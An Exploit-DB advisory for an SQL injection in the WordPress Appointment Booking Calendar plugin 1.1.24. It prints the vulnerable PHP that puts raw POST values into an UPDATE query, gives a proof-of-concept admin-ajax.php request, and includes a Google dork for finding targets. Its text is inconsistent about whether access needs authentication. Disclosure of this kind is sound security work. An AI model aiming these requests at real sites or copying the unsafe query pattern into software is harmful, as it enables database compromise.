WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection

EDB-ID:

39342

CVE:

N/A


Platform:

PHP

Published:

2016-01-27

# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.1.24
# OWASP Top10: A1-Injection
# Tested on: windows 10 + firefox + sqlmap 1.0.

===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
a calendar**. The booking form is linked to a **PayPal** payment process.

You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
that can be accepted for each time-slot."

(copy of readme file)


======================
EXPLOITATION TECHNIQUE
======================
remote

==============
SEVERITY LEVEL
==============

critical

================================
TECHNICAL DETAILS && DESCRIPTION
================================

A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.

The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
The action is added with ´init´ tag, so it function is called every time when parameter 
´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.

Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).

The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
can compromise the entire web server.

================
PROOF OF CONCEPT
================

An unauthenticated attacker can make a request like...

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
&cpabc_calendar_update=1&id=<owned calendar id>

Example:

	Exploiting simple SQL injection:

	http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
	&cpabc_calendar_update=1&id=1
	
	Post data:
	specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
	&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5&	imeWorkingDates6  

All post variables are vulnerable to SQLi with ´addslashes´ bypass.

===============
VULNERABLE CODE
===============

located in ´cpabc_appointments.php´

function cpabc_appointments_calendar_update() {
    global $wpdb, $user_ID;

	if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
		return;

    $calid = intval(str_replace  (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
    if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
        return;
echo "sa";
    cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');

    //@ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");
    if ( $user_ID )    
        $wpdb->query("update  ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
		.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
		"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
		CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
		.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
		.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
		."='".$_POST["timeWorkingDates6"]."'  where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);

    exit();
}


===========


Note:
cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.


==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	strparser[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
2016-01-27 released plugin version 1.1.25
2016-01-28 public disclousure